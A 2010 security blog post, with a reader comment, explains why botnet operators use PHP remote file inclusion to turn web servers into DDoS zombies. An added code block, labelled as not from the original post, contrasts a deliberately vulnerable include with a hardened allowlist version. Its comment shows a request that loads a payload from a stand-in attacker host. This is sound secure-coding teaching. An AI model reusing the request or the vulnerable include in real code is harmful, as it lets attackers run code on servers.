Friday, May 14, 2010

Botnet Herders Targeting Web Servers

Submitted by Ryan Barnett 5/14/2010

Numerous media outlets have reported on a "new" DDoS botnet that is targeting web servers as zombie participants vs. standard user computers. The motivation for targeting web servers includes:
  1. Web servers are always online, whereas home computer systems are often shut down when not in use. This means that the number of botnet systems under control at any one time is variable. This factors into the botnet owner's service offerings, as they are often selling their botnet services, and having a reliable, strong botnet is key.
  2. Web servers have more network bandwidth than home computer users. This is essentially a Quality of Service metric: commercial web servers are guaranteed specific amounts of network bandwidth, whereas home computer users typically have much less. Additionally, home user network traffic is often throttled, which reduces the DDoS attack traffic they can generate.
  3. Web servers have more horsepower than home computers. The number of CPUs, amount of RAM, etc. means that commercial servers can generate much more DDoS network traffic than home computer systems.
  4. Web servers are less likely to be blacklisted by an ISP than home computer systems. This means that web server botnet zombies will stay online, sending traffic, much longer than home computers.
Essentially, web server botnet participants are like "Super Soldiers" compared to normal grunts in the botnet army.

While the information presented by the media is interesting, the tactic is by no means new.

How do I know this? Because we (Breach Security) reported on this exact same concept 2 years ago in our WASC Web Hacking Incident Database Annual Report Presentation Slides.
What we showed was that botnet operators have been using PHP Remote File Inclusion (RFI) attacks to try to exploit web servers in order to download DDoS client code, forcing those systems to participate in DDoS attacks. RFI attacks are still a big problem, and a surprising number of sites are still vulnerable even though newer versions of PHP ship with a more secure default configuration that prevents this exploit from working. As with other types of software, organizations are simply not able to upgrade to the newest versions that fix the flaws in a timely manner.
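As an added illustration (this is not code from the original post or from Breach Security), the snippet below places the kind of PHP include that RFI attacks abuse next to a hardened version that maps the untrusted request parameter onto a fixed allowlist of local files. The page names, the `pages/` directory and the `PAGE_MAP` allowlist are assumptions made for the example.

```php
<?php
// Added example, not part of the original post. Hypothetical page router.

// VULNERABLE: the include path is built directly from the request. With the
// older PHP default (allow_url_include effectively on), a request such as
// ?page=http://attacker.example/payload.txt makes PHP fetch and execute
// remote code; with it Off, local file inclusion is still possible.
function render_page_vulnerable(array $query): void
{
    include $query['page'] . '.php';
}

// HARDENED: the request only supplies a key; the file name comes from a
// fixed allowlist, and the resolved path is checked to stay under pages/.
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the allowed page, or null for anything else.
function resolve_page(?string $name): ?string
{
    if ($name === null || !isset(PAGE_MAP[$name])) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . PAGE_MAP[$name]);
    // realpath() returns false for a missing file; the prefix check rejects
    // anything that resolved outside the pages directory (e.g. via symlink).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(array $query): void
{
    $path = resolve_page($query['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $path;
}

render_page_hardened($_GET);
```

The allowlist is the real fix: no value a client can send is ever used as a file or URL path. The configuration change the post refers to, `allow_url_include = Off` (the default since PHP 5.2.0), only stops the remote variant, so it is worth keeping both, and setting `allow_url_fopen = Off` as well on servers that never need to open URLs from PHP.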

It is a shame that the new OWASP Top 10 Most Critical Web Application Security Risks release has removed the old A3: Malicious File Execution category, as RFI was included in it. The stated rationale for removing it is:
REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
While I don't disagree with some of this rationale, the fact is that there are still many, many sites that are vulnerable to RFI attacks and recruiting the compromised web site into a Botnet Army is just one of the possible bad outcomes...

1 comment:

Wladimir Palant said...

You are right, I still see RFI attempts in my server logs. However, the volume is nowhere close to what I've seen in 2007. So I guess that the number of vulnerable web servers has gone down very significantly - and hence the decreased popularity of this attack.

Wladimir Palant